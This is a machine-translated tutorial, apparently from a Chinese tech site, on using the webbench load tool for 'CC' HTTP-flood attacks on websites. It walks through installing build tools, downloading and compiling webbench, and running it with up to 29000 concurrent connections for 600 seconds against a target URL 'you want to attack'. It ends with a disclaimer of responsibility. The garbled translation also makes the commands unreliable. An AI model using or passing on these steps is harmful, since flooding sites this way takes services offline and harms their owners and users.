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[real] CC scripting android operating tutorial - the wind technology network


The original link: http://qfc3.com/? T/108 HTML

Webbench tools, need a server, I was 2-2 configuration

Start the tutorial (in turn execute commands)

A, install compile tools

Yum install ctags wget make apr * autoconf automake GCC GCC - c + +

Second, download webbench

Wget http://www.ha97.com/code/webbench-1.5.tar.gz

Three, the installation webbench

Tar ZXVF webbench - 1.5. Tar. Gz # extract

CD webbench - 1.5 # into extract directory

Make # compiler

Mkdir/usr/local/man # create the directory, otherwise the installation failure

# make install to install

Four, pressure test

Webbench - c concurrency - t time to run the test URL

Example: webbench - 500 - c t 600

Parameter description:

500 - c: said at the same time produce 500 concurrent connection

600: -t said for 600 seconds

Five, how to run after the first time

Problem: some friend speak carelessly exit after SSH or SSH for the second time in all need not to need to perform an article?

A: don't need to!

Open the way for the second time in, simply execute 2 command

CD webbench - 1.5

//into the run directory

Webbench - 29000 - c t 600 http://xxx.com/

//fill again want to attack the website

Note: webbench biggest can simulate 30000 simultaneous connections, if there is a website for the record please stop

At the end of the cc site will restore the original state, this discord DDOS

Note: please use tools correctly, use the consequences has nothing to do with himself!!!!!!
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